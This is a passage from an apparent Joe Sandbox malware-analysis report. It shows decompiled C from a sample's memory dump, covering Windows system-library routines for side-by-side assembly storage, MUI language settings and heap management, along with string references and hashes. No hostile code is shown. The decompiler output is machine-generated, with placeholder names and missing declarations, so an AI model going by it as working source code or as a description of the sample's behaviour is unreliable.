                                                        						_push( *_t104);
                                                        						_t80 = E018295D0();
                                                        					}
                                                        					goto L9;
                                                        				}
                                                        				_t84 =  *((intOrPtr*)(_t104 + 4));
                                                        				if(_t84 != 0) {
                                                        					if(_t84 != 1) {
                                                        						_t109 =  *_t104;
                                                        						_t80 = _t84 + 0xfffffffe;
                                                        						_v608 = _t109;
                                                        						_v584 = 0;
                                                        						_v596 = _t80;
                                                        						if(_t109 == 0) {
                                                        							L30:
                                                        							 *((char*)(_t104 + 9)) = 1;
                                                        							goto L9;
                                                        						}
                                                        						_push( &_v584);
                                                        						_push(0x220);
                                                        						_t115 =  &_v556;
                                                        						_push( &_v556);
                                                        						_push(0);
                                                        						_push(_t80);
                                                        						_push(_t109);
                                                        						_t80 = E01829820();
                                                        						_v624 = _t80;
                                                        						if(_t80 >= 0) {
                                                        							_t80 = _v544;
                                                        							if(_t80 > 0xfffe) {
                                                        								L20:
                                                        								 *((char*)(_t104 + 8)) = 1;
                                                        								if(_t126 != 0) {
                                                        									 *_t126 = 0xc0000106;
                                                        								}
                                                        								goto L9;
                                                        							}
                                                        							_t115 =  &_v592;
                                                        							_v592 = _t80;
                                                        							_v590 = _t80;
                                                        							_v588 =  &_v540;
                                                        							_t80 = E01874A28(_v608,  &_v592, _t104 + 0xc);
                                                        							_v612 = _t80;
                                                        							if(_t80 >= 0) {
                                                        								goto L9;
                                                        							}
                                                        							_push(_t80);
                                                        							_t80 = E01875720(0x33, 0, "SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx\n",  &_v592);
                                                        							 *((char*)(_t104 + 8)) = 1;
                                                        							goto L36;
                                                        						}
                                                        						if(_t80 == 0x8000001a) {
                                                        							goto L30;
                                                        						}
                                                        						_push(_t80);
                                                        						_t80 = E01875720(0x33, 0, "SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx\n", _v596);
                                                        						_t133 = _t133 + 0x14;
                                                        						 *((char*)(_t104 + 8)) = 1;
                                                        						if(_t126 == 0) {
                                                        							goto L9;
                                                        						}
                                                        						_t80 = _v600;
                                                        						goto L38;
                                                        					}
                                                        					E0182BB40(_t106,  &_v608, E017FAAB0());
                                                        					_t115 = _v616 & 0x0000ffff;
                                                        					 *(_t104 + 0xc) = 0;
                                                        					_t27 = _t115 + 0x10; // 0x50
                                                        					_t80 = _t27;
                                                        					if(_t27 > ( *(_t104 + 0xe) & 0x0000ffff)) {
                                                        						L22:
                                                        						 *((char*)(_t104 + 8)) = 1;
                                                        						if(_t126 != 0) {
                                                        							 *_t126 = 0xc0000023;
                                                        						}
                                                        						goto L9;
                                                        					}
                                                        					E0182F3E0( *((intOrPtr*)(_t104 + 0x10)), _v604, _t115);
                                                        					_t133 = _t133 + 0xc;
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					_t80 = _v608 + 0x10;
                                                        					L8:
                                                        					 *(_t104 + 0xc) = _t80;
                                                        					goto L9;
                                                        				}
                                                        				_t80 =  *( *[fs:0x30] + 0x10);
                                                        				_t123 =  *( *( *[fs:0x30] + 0x10) + 0x38) & 0x0000ffff;
                                                        				_v596 = _t123;
                                                        				_t9 = _t123 + 0x10; // 0x17f6177
                                                        				_t112 = _t9;
                                                        				if(_t112 > 0xfffe) {
                                                        					goto L20;
                                                        				}
                                                        				_t80 =  *(_t104 + 0xe) & 0x0000ffff;
                                                        				if(_t112 > ( *(_t104 + 0xe) & 0x0000ffff)) {
                                                        					goto L22;
                                                        				}
                                                        				_t113 =  *((intOrPtr*)( *( *[fs:0x30] + 0x10) + 0x3c));
                                                        				if(( *( *( *[fs:0x30] + 0x10) + 8) & 0x00000001) == 0) {
                                                        					_t113 = _t113 +  *( *[fs:0x30] + 0x10);
                                                        				}
                                                        				E0182F3E0( *((intOrPtr*)(_t104 + 0x10)), _t113, _t123);
                                                        				_t133 = _t133 + 0xc;
                                                        				_t115 = 1;
                                                        				asm("movsd");
                                                        				asm("movsd");
                                                        				asm("movsd");
                                                        				asm("movsd");
                                                        				 *(_t104 + 0xc) = _v596 + 0xe;
                                                        				if(E0181D268( *((intOrPtr*)(_t104 + 0x10)), 1) != 0) {
                                                        					goto L9;
                                                        				} else {
                                                        					_t80 = 0;
                                                        					goto L8;
                                                        				}
                                                        			}













































                                                        Strings
                                                        • @, xrefs: 0181CE1D
                                                        • \WinSxS\, xrefs: 0181CDF3
                                                        • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 0185AD9C
                                                        • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 0185AD78
                                                        • .Local\, xrefs: 0181CD61
                                                        • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 0185AD06
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                        • API String ID: 0-3926108909
                                                        • Opcode ID: de22bbe2a30c73e8d8aa9c25fbbc93f102978da1701d02a49aace71d85466ba4
                                                        • Instruction ID: ae98d17381089b374e1057f1f2b9ba526ddc386229acd5eac5a2779bf57183fa
                                                        • Opcode Fuzzy Hash: de22bbe2a30c73e8d8aa9c25fbbc93f102978da1701d02a49aace71d85466ba4
                                                        • Instruction Fuzzy Hash: 4381CCB25083429FD726DF29C880A2BBBE8EF85714F44895DFC85DB245D374DA44CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 96%
                                                        			E017F3D34(signed int* __ecx) {
                                                        				signed int* _v8;
                                                        				char _v12;
                                                        				signed int* _v16;
                                                        				signed int* _v20;
                                                        				char _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				char _v36;
                                                        				signed int _v40;
                                                        				signed int _v44;
                                                        				signed int* _v48;
                                                        				signed int* _v52;
                                                        				signed int _v56;
                                                        				signed int _v60;
                                                        				char _v68;
                                                        				signed int _t140;
                                                        				signed int _t161;
                                                        				signed int* _t236;
                                                        				signed int* _t242;
                                                        				signed int* _t243;
                                                        				signed int* _t244;
                                                        				signed int* _t245;
                                                        				signed int _t255;
                                                        				void* _t257;
                                                        				signed int _t260;
                                                        				void* _t262;
                                                        				signed int _t264;
                                                        				void* _t267;
                                                        				signed int _t275;
                                                        				signed int* _t276;
                                                        				short* _t277;
                                                        				signed int* _t278;
                                                        				signed int* _t279;
                                                        				signed int* _t280;
                                                        				short* _t281;
                                                        				signed int* _t282;
                                                        				short* _t283;
                                                        				signed int* _t284;
                                                        				void* _t285;
                                                        
                                                        				_v60 = _v60 | 0xffffffff;
                                                        				_t280 = 0;
                                                        				_t242 = __ecx;
                                                        				_v52 = __ecx;
                                                        				_v8 = 0;
                                                        				_v20 = 0;
                                                        				_v40 = 0;
                                                        				_v28 = 0;
                                                        				_v32 = 0;
                                                        				_v44 = 0;
                                                        				_v56 = 0;
                                                        				_t275 = 0;
                                                        				_v16 = 0;
                                                        				if(__ecx == 0) {
                                                        					_t280 = 0xc000000d;
                                                        					_t140 = 0;
                                                        					L50:
                                                        					 *_t242 =  *_t242 | 0x00000800;
                                                        					_t242[0x13] = _t140;
                                                        					_t242[0x16] = _v40;
                                                        					_t242[0x18] = _v28;
                                                        					_t242[0x14] = _v32;
                                                        					_t242[0x17] = _t275;
                                                        					_t242[0x15] = _v44;
                                                        					_t242[0x11] = _v56;
                                                        					_t242[0x12] = _v60;
                                                        					return _t280;
                                                        				}
                                                        				if(E017F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                        					_v56 = 1;
                                                        					if(_v8 != 0) {
                                                        						L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                        					}
                                                        					_v8 = _t280;
                                                        				}
                                                        				if(E017F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                        					_v60 =  *_v8;
                                                        					L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                        					_v8 = _t280;
                                                        				}
                                                        				if(E017F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                        					L16:
                                                        					if(E017F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                        						L28:
                                                        						if(E017F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                        							L46:
                                                        							_t275 = _v16;
                                                        							L47:
                                                        							_t161 = 0;
                                                        							L48:
                                                        							if(_v8 != 0) {
                                                        								L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                        							}
                                                        							_t140 = _v20;
                                                        							if(_t140 != 0) {
                                                        								if(_t275 != 0) {
                                                        									L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                        									_t275 = 0;
                                                        									_v28 = 0;
                                                        									_t140 = _v20;
                                                        								}
                                                        							}
                                                        							goto L50;
                                                        						}
                                                        						_t167 = _v12;
                                                        						_t255 = _v12 + 4;
                                                        						_v44 = _t255;
                                                        						if(_t255 == 0) {
                                                        							_t276 = _t280;
                                                        							_v32 = _t280;
                                                        						} else {
                                                        							_t276 = E01804620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                        							_t167 = _v12;
                                                        							_v32 = _t276;
                                                        						}
                                                        						if(_t276 == 0) {
                                                        							_v44 = _t280;
                                                        							_t280 = 0xc0000017;
                                                        							goto L46;
                                                        						} else {
                                                        							E0182F3E0(_t276, _v8, _t167);
                                                        							_v48 = _t276;
                                                        							_t277 = E01831370(_t276, 0x17c4e90);
                                                        							_pop(_t257);
                                                        							if(_t277 == 0) {
                                                        								L38:
                                                        								_t170 = _v48;
                                                        								if( *_v48 != 0) {
                                                        									E0182BB40(0,  &_v68, _t170);
                                                        									if(L017F43C0( &_v68,  &_v24) != 0) {
                                                        										_t280 =  &(_t280[0]);
                                                        									}
                                                        								}
                                                        								if(_t280 == 0) {
                                                        									_t280 = 0;
                                                        									L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                        									_v44 = 0;
                                                        									_v32 = 0;
                                                        								} else {
                                                        									_t280 = 0;
                                                        								}
                                                        								_t174 = _v8;
                                                        								if(_v8 != 0) {
                                                        									L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                        								}
                                                        								_v8 = _t280;
                                                        								goto L46;
                                                        							}
                                                        							_t243 = _v48;
                                                        							do {
                                                        								 *_t277 = 0;
                                                        								_t278 = _t277 + 2;
                                                        								E0182BB40(_t257,  &_v68, _t243);
                                                        								if(L017F43C0( &_v68,  &_v24) != 0) {
                                                        									_t280 =  &(_t280[0]);
                                                        								}
                                                        								_t243 = _t278;
                                                        								_t277 = E01831370(_t278, 0x17c4e90);
                                                        								_pop(_t257);
                                                        							} while (_t277 != 0);
                                                        							_v48 = _t243;
                                                        							_t242 = _v52;
                                                        							goto L38;
                                                        						}
                                                        					}
                                                        					_t191 = _v12;
                                                        					_t260 = _v12 + 4;
                                                        					_v28 = _t260;
                                                        					if(_t260 == 0) {
                                                        						_t275 = _t280;
                                                        						_v16 = _t280;
                                                        					} else {
                                                        						_t275 = E01804620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                        						_t191 = _v12;
                                                        						_v16 = _t275;
                                                        					}
                                                        					if(_t275 == 0) {
                                                        						_v28 = _t280;
                                                        						_t280 = 0xc0000017;
                                                        						goto L47;
                                                        					} else {
                                                        						E0182F3E0(_t275, _v8, _t191);
                                                        						_t285 = _t285 + 0xc;
                                                        						_v48 = _t275;
                                                        						_t279 = _t280;
                                                        						_t281 = E01831370(_v16, 0x17c4e90);
                                                        						_pop(_t262);
                                                        						if(_t281 != 0) {
                                                        							_t244 = _v48;
                                                        							do {
                                                        								 *_t281 = 0;
                                                        								_t282 = _t281 + 2;
                                                        								E0182BB40(_t262,  &_v68, _t244);
                                                        								if(L017F43C0( &_v68,  &_v24) != 0) {
                                                        									_t279 =  &(_t279[0]);
                                                        								}
                                                        								_t244 = _t282;
                                                        								_t281 = E01831370(_t282, 0x17c4e90);
                                                        								_pop(_t262);
                                                        							} while (_t281 != 0);
                                                        							_v48 = _t244;
                                                        							_t242 = _v52;
                                                        						}
                                                        						_t201 = _v48;
                                                        						_t280 = 0;
                                                        						if( *_v48 != 0) {
                                                        							E0182BB40(_t262,  &_v68, _t201);
                                                        							if(L017F43C0( &_v68,  &_v24) != 0) {
                                                        								_t279 =  &(_t279[0]);
                                                        							}
                                                        						}
                                                        						if(_t279 == 0) {
                                                        							L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                        							_v28 = _t280;
                                                        							_v16 = _t280;
                                                        						}
                                                        						_t202 = _v8;
                                                        						if(_v8 != 0) {
                                                        							L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                        						}
                                                        						_v8 = _t280;
                                                        						goto L28;
                                                        					}
                                                        				}
                                                        				_t214 = _v12;
                                                        				_t264 = _v12 + 4;
                                                        				_v40 = _t264;
                                                        				if(_t264 == 0) {
                                                        					_v20 = _t280;
                                                        				} else {
                                                        					_t236 = E01804620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                        					_t280 = _t236;
                                                        					_v20 = _t236;
                                                        					_t214 = _v12;
                                                        				}
                                                        				if(_t280 == 0) {
                                                        					_t161 = 0;
                                                        					_t280 = 0xc0000017;
                                                        					_v40 = 0;
                                                        					goto L48;
                                                        				} else {
                                                        					E0182F3E0(_t280, _v8, _t214);
                                                        					_t285 = _t285 + 0xc;
                                                        					_v48 = _t280;
                                                        					_t283 = E01831370(_t280, 0x17c4e90);
                                                        					_pop(_t267);
                                                        					if(_t283 != 0) {
                                                        						_t245 = _v48;
                                                        						do {
                                                        							 *_t283 = 0;
                                                        							_t284 = _t283 + 2;
                                                        							E0182BB40(_t267,  &_v68, _t245);
                                                        							if(L017F43C0( &_v68,  &_v24) != 0) {
                                                        								_t275 = _t275 + 1;
                                                        							}
                                                        							_t245 = _t284;
                                                        							_t283 = E01831370(_t284, 0x17c4e90);
                                                        							_pop(_t267);
                                                        						} while (_t283 != 0);
                                                        						_v48 = _t245;
                                                        						_t242 = _v52;
                                                        					}
                                                        					_t224 = _v48;
                                                        					_t280 = 0;
                                                        					if( *_v48 != 0) {
                                                        						E0182BB40(_t267,  &_v68, _t224);
                                                        						if(L017F43C0( &_v68,  &_v24) != 0) {
                                                        							_t275 = _t275 + 1;
                                                        						}
                                                        					}
                                                        					if(_t275 == 0) {
                                                        						L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                        						_v40 = _t280;
                                                        						_v20 = _t280;
                                                        					}
                                                        					_t225 = _v8;
                                                        					if(_v8 != 0) {
                                                        						L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                        					}
                                                        					_v8 = _t280;
                                                        					goto L16;
                                                        				}
                                                        			}











































                                                        Strings
                                                        • Kernel-MUI-Number-Allowed, xrefs: 017F3D8C
                                                        • Kernel-MUI-Language-Allowed, xrefs: 017F3DC0
                                                        • WindowsExcludedProcs, xrefs: 017F3D6F
                                                        • Kernel-MUI-Language-SKU, xrefs: 017F3F70
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 017F3E97
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 0-258546922
                                                        • Opcode ID: 6fc135f3348c14852a968f773edd43a2996b5bc125cf2a676d358b1445b2ba3b
                                                        • Instruction ID: 247861711242383eb7c9a9646ddf94d7b05c8cf96b8d71290c911221d74cdeb4
                                                        • Opcode Fuzzy Hash: 6fc135f3348c14852a968f773edd43a2996b5bc125cf2a676d358b1445b2ba3b
                                                        • Instruction Fuzzy Hash: E6F10B72D01619EBCB12DF98C980AEFFBB9FF59750F15006AE605E7251E7349A01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 29%
                                                        			E017E40E1(void* __edx) {
                                                        				void* _t19;
                                                        				void* _t29;
                                                        
                                                        				_t28 = _t19;
                                                        				_t29 = __edx;
                                                        				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        						_push("HEAP: ");
                                                        						E017EB150();
                                                        					} else {
                                                        						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					E017EB150("Invalid heap signature for heap at %p", _t28);
                                                        					if(_t29 != 0) {
                                                        						E017EB150(", passed to %s", _t29);
                                                        					}
                                                        					_push("\n");
                                                        					E017EB150();
                                                        					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                        						 *0x18d6378 = 1;
                                                        						asm("int3");
                                                        						 *0x18d6378 = 0;
                                                        					}
                                                        					return 0;
                                                        				}
                                                        				return 1;
                                                        			}






                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                        • API String ID: 0-188067316
                                                        • Opcode ID: 28d1a3529a0c274c3e4642afeb537cadba2000c715abb7db46a367eb8d6aa473
                                                        • Instruction ID: b57d246bf6ad0382cfa8992fbf1ea271a17e332baec74de23b6ef08604b7ac64
                                                        • Opcode Fuzzy Hash: 28d1a3529a0c274c3e4642afeb537cadba2000c715abb7db46a367eb8d6aa473
                                                        • Instruction Fuzzy Hash: 22012832102246AFD2299B6DE4DDF96FBE4DB04F34F28406EF10587741CEB4D540C611
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 70%
                                                        			E0180A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                                        				void* _v5;
                                                        				signed short _v12;
                                                        				intOrPtr _v16;
                                                        				signed int _v20;
                                                        				signed short _v24;
                                                        				signed short _v28;
                                                        				signed int _v32;
                                                        				signed short _v36;
                                                        				signed int _v40;
                                                        				intOrPtr _v44;
                                                        				intOrPtr _v48;
                                                        				signed short* _v52;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __ebp;
                                                        				signed int _t131;
                                                        				signed char _t134;
                                                        				signed int _t138;
                                                        				char _t141;
                                                        				signed short _t142;
                                                        				void* _t146;
                                                        				signed short _t147;
                                                        				intOrPtr* _t149;
                                                        				intOrPtr _t156;
                                                        				signed int _t167;
                                                        				signed int _t168;
                                                        				signed short* _t173;
                                                        				signed short _t174;
                                                        				intOrPtr* _t182;
                                                        				signed short _t184;
                                                        				intOrPtr* _t187;
                                                        				intOrPtr _t197;
                                                        				intOrPtr _t206;
                                                        				intOrPtr _t210;
                                                        				signed short _t211;
                                                        				intOrPtr* _t212;
                                                        				signed short _t214;
                                                        				signed int _t216;
                                                        				intOrPtr _t217;
                                                        				signed char _t225;
                                                        				signed short _t235;
                                                        				signed int _t237;
                                                        				intOrPtr* _t238;
                                                        				signed int _t242;
                                                        				unsigned int _t245;
                                                        				signed int _t251;
                                                        				intOrPtr* _t252;
                                                        				signed int _t253;
                                                        				intOrPtr* _t255;
                                                        				signed int _t256;
                                                        				void* _t257;
                                                        				void* _t260;
                                                        
                                                        				_t256 = __edx;
                                                        				_t206 = __ecx;
                                                        				_t235 = _a4;
                                                        				_v44 = __ecx;
                                                        				_v24 = _t235;
                                                        				if(_t235 == 0) {
                                                        					L41:
                                                        					return _t131;
                                                        				}
                                                        				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                                        				if(_t251 == 0) {
                                                        					__eflags =  *0x18d8748 - 1;
                                                        					if( *0x18d8748 >= 1) {
                                                        						__eflags =  *(__edx + 2) & 0x00000008;
                                                        						if(( *(__edx + 2) & 0x00000008) == 0) {
                                                        							_t110 = _t256 + 0xfff; // 0xfe7
                                                        							__eflags = (_t110 & 0xfffff000) - __edx;
                                                        							if((_t110 & 0xfffff000) != __edx) {
                                                        								_t197 =  *[fs:0x30];
                                                        								__eflags =  *(_t197 + 0xc);
                                                        								if( *(_t197 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E017EB150();
                                                        									_t260 = _t257 + 4;
                                                        								} else {
                                                        									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        									_t260 = _t257 + 8;
                                                        								}
                                                        								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                        								E017EB150();
                                                        								_t257 = _t260 + 4;
                                                        								__eflags =  *0x18d7bc8;
                                                        								if(__eflags == 0) {
                                                        									E018A2073(_t206, 1, _t251, __eflags);
                                                        								}
                                                        								_t235 = _v24;
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				_t134 =  *((intOrPtr*)(_t256 + 6));
                                                        				if(_t134 == 0) {
                                                        					_t210 = _t206;
                                                        					_v48 = _t206;
                                                        				} else {
                                                        					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                        					_v48 = _t210;
                                                        				}
                                                        				_v5 =  *(_t256 + 2);
                                                        				do {
                                                        					if(_t235 > 0xfe00) {
                                                        						_v12 = 0xfe00;
                                                        						__eflags = _t235 - 0xfe01;
                                                        						if(_t235 == 0xfe01) {
                                                        							_v12 = 0xfdf0;
                                                        						}
                                                        						_t138 = 0;
                                                        					} else {
                                                        						_v12 = _t235 & 0x0000ffff;
                                                        						_t138 = _v5;
                                                        					}
                                                        					 *(_t256 + 2) = _t138;
                                                        					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                                        					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                                        					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                                        						_t141 = 0;
                                                        					} else {
                                                        						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                                        						_v40 = _t141;
                                                        						if(_t141 >= 0xfe) {
                                                        							_push(_t210);
                                                        							E018AA80D(_t236, _t256, _t210, 0);
                                                        							_t141 = _v40;
                                                        						}
                                                        					}
                                                        					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                                        					 *((char*)(_t256 + 6)) = _t141;
                                                        					_t142 = _v12;
                                                        					 *_t256 = _t142;
                                                        					 *(_t256 + 3) = 0;
                                                        					_t211 = _t142 & 0x0000ffff;
                                                        					 *((char*)(_t256 + 7)) = 0;
                                                        					_v20 = _t211;
                                                        					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                                        						_t119 = _t256 + 0x10; // -8
                                                        						E0183D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                                        						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                                        						_t211 = _v20;
                                                        					}
                                                        					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                                        					if(_t252 == 0) {
                                                        						L56:
                                                        						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                                        						_t146 = _t206 + 0xc0;
                                                        						goto L19;
                                                        					} else {
                                                        						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                                        							L15:
                                                        							_t185 = _t211;
                                                        							goto L17;
                                                        						} else {
                                                        							while(1) {
                                                        								_t187 =  *_t252;
                                                        								if(_t187 == 0) {
                                                        									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                        									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                        									goto L17;
                                                        								}
                                                        								_t252 = _t187;
                                                        								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                                        									continue;
                                                        								}
                                                        								goto L15;
                                                        							}
                                                        							while(1) {
                                                        								L17:
                                                        								_t212 = E0180AB40(_t206, _t252, 1, _t185, _t211);
                                                        								if(_t212 != 0) {
                                                        									_t146 = _t206 + 0xc0;
                                                        									break;
                                                        								}
                                                        								_t252 =  *_t252;
                                                        								_t211 = _v20;
                                                        								_t185 =  *(_t252 + 0x14);
                                                        							}
                                                        							L19:
                                                        							if(_t146 != _t212) {
                                                        								_t237 =  *(_t206 + 0x4c);
                                                        								_t253 = _v20;
                                                        								while(1) {
                                                        									__eflags = _t237;
                                                        									if(_t237 == 0) {
                                                        										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                                        									} else {
                                                        										_t184 =  *(_t212 - 8);
                                                        										_t237 =  *(_t206 + 0x4c);
                                                        										__eflags = _t184 & _t237;
                                                        										if((_t184 & _t237) != 0) {
                                                        											_t184 = _t184 ^  *(_t206 + 0x50);
                                                        											__eflags = _t184;
                                                        										}
                                                        										_t147 = _t184 & 0x0000ffff;
                                                        									}
                                                        									__eflags = _t253 - (_t147 & 0x0000ffff);
                                                        									if(_t253 <= (_t147 & 0x0000ffff)) {
                                                        										goto L20;
                                                        									}
                                                        									_t212 =  *_t212;
                                                        									__eflags = _t206 + 0xc0 - _t212;
                                                        									if(_t206 + 0xc0 != _t212) {
                                                        										continue;
                                                        									} else {
                                                        										goto L20;
                                                        									}
                                                        									goto L56;
                                                        								}
                                                        							}
                                                        							L20:
                                                        							_t149 =  *((intOrPtr*)(_t212 + 4));
                                                        							_t33 = _t256 + 8; // -16
                                                        							_t238 = _t33;
                                                        							_t254 =  *_t149;
                                                        							if( *_t149 != _t212) {
                                                        								_push(_t212);
                                                        								E018AA80D(0, _t212, 0, _t254);
                                                        							} else {
                                                        								 *_t238 = _t212;
                                                        								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                                        								 *_t149 = _t238;
                                                        								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                                        							}
                                                        							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                                        							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                                        							if(_t255 == 0) {
                                                        								L36:
                                                        								if( *(_t206 + 0x4c) != 0) {
                                                        									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                                        									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                                        								}
                                                        								_t210 = _v48;
                                                        								_t251 = _v12 & 0x0000ffff;
                                                        								_t131 = _v20;
                                                        								_t235 = _v24 - _t131;
                                                        								_v24 = _t235;
                                                        								_t256 = _t256 + _t131 * 8;
                                                        								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                                        									goto L41;
                                                        								} else {
                                                        									goto L39;
                                                        								}
                                                        							} else {
                                                        								_t216 =  *_t256 & 0x0000ffff;
                                                        								_v28 = _t216;
                                                        								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                                        									L28:
                                                        									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                                        									_v32 = _t242;
                                                        									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                                        										_t167 = _t242 + _t242;
                                                        									} else {
                                                        										_t167 = _t242;
                                                        									}
                                                        									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                                        									_t168 = _t167 << 2;
                                                        									_v40 = _t168;
                                                        									_t206 = _v44;
                                                        									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                                        									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                                        										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                                        									}
                                                        									_t217 = _v16;
                                                        									if(_t217 != 0) {
                                                        										_t173 = _t217 - 8;
                                                        										_v52 = _t173;
                                                        										_t174 =  *_t173;
                                                        										__eflags =  *(_t206 + 0x4c);
                                                        										if( *(_t206 + 0x4c) != 0) {
                                                        											_t245 =  *(_t206 + 0x50) ^ _t174;
                                                        											_v36 = _t245;
                                                        											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                                        											__eflags = _t245 >> 0x18 - _t225;
                                                        											if(_t245 >> 0x18 != _t225) {
                                                        												_push(_t225);
                                                        												E018AA80D(_t206, _v52, 0, 0);
                                                        											}
                                                        											_t174 = _v36;
                                                        											_t217 = _v16;
                                                        											_t242 = _v32;
                                                        										}
                                                        										_v28 = _v28 - (_t174 & 0x0000ffff);
